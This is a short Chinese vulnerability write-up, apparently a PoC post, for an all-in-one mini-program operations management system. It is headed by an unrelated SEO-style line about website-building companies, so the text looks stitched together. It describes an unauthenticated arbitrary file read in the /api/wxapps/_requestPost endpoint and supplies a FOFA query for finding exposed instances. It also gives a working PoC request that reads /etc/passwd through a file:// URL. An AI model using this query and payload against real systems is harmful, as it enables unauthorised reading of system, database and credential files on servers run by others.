成都前几年网站建设公司长宁手机网站建设

0x01 产品简介

万能小程序运营管理系统是一种功能全面的系统，旨在帮助开发者和运营人员更好地管理和推广小程序。该系统集成了多种功能模块，覆盖了从小程序开发、部署到运营管理的全链条服务。系统通过提供丰富的功能和工具，帮助用户轻松搭建、管理和优化小程序。该系统支持多平台部署，包括微信小程序、支付宝小程序、百度小程序、QQ小程序等，满足不同用户的需求。

0x02 漏洞概述

万能小程序运营管理系统 _requestPost 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 复现环境

FOFA：

body="/com/css/head_foot.css" || body="/com/css/iconfont"

0x04 漏洞复现

PoC

GET /api/wxapps/_requestPost?data=1&url=file:///etc/passwd HTTP/1.1
Host: